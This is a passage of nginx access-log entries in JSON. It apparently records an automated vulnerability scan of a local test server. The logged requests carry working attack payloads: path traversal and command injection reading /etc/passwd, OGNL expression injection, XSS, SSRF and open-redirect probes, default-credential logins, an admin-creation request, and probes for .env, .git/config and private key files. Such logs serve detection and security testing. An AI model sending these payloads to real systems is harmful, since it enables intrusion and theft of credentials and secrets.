"18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api-docs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"username={{username}}&password={{password}}&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.example HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmldata?item=all HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/hana/xs/formLogin/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /chpstrt.php?chppath=Home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resource/file%3a///etc/passwd/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api-docs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /template/custom/content-editor HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22vehicletitle\x22\x0D\x0A\x0D\x0ATest\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22brandname\x22\x0D\x0A\x0D\x0A1\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22vehicalorcview\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22priceperday\x22\x0D\x0A\x0D\x0A500\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22fueltype\x22\x0D\x0A\x0D\x0APetrol\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22modelyear\x22\x0D\x0A\x0D\x0A2022\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22seatingcapacity\x22\x0D\x0A\x0D\x0A5\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img1\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img2\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img3\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img4\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img5\x22; filename=\x22\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22submit\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/post-avehical.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=GK11UO&adminpassword=NH6NZ8&adminemail=test@test.com&adminname=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.stage HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/settings/values HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/index.php?db=information_schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfcache.map HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /events../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api_docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /templates/editor-preload-container HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.019","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=http://0177.0.0.1/server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jkstatus/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"{\x22dashboard\x22: {\x22editable\x22:false,\x22hideControls\x22:true,\x22nav\x22:[{\x22enable\x22:false,\x22type\x22:\x22timepicker\x22}],\x22rows\x22: [{}],\x22style\x22:\x22dark\x22,\x22tags\x22:[],\x22templating\x22:{\x22list\x22:[]},\x22time\x22:{},\x22timezone\x22:\x22browser\x22,\x22title\x22:\x22Home\x22,\x22version\x22:5},\x22expires\x22: 3600}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/snapshots HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/index.php?db=information_schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /media../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var/jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /users/user-dark-features HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"------WebKitFormBoundaryAjZMsILtbrBp8VbC\x0D\x0AContent-Disposition: form-data; name=\x22username\x22\x0D\x0A\x0D\x0Aadmin\x0D\x0A------WebKitFormBoundaryAjZMsILtbrBp8VbC\x0D\x0AContent-Disposition: form-data; name=\x22password\x22\x0D\x0A\x0D\x0Apanabit\x0D\x0A------WebKitFormBoundaryAjZMsILtbrBp8VbC--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/userverify.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/login/login.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?host=http://0177.0.0.1/server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fcgi-bin/wgsetcgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /package.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /passwordrecovered.cgi?id=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp?user=j%22;-alert(1)-%22x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 